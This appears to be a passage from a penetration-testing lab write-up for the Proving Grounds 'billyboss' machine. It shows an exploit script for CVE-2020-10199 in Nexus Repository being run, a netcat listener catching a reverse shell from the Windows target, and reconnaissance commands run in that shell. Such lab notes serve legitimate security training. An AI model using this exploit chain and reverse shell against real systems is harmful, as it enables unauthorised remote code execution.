CVE-2020-10199


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ python3 CVE-2020-10199.py               
Logging in
Logged in successfully
Command executed

Executing the modified exploit.

Fetched

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 8081
listening on [any] 8081 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 63055
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
 
C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
 whoami
billyboss\nathan
 
C:\Users\nathan\Nexus\nexus-3.21.0-05> hostname
 hostname
billyboss
 
C:\Users\nathan\Nexus\nexus-3.21.0-05> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.148.61
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.148.254

Initial Foothold established to the target system as the nathan user via exploiting CVE-2020-10199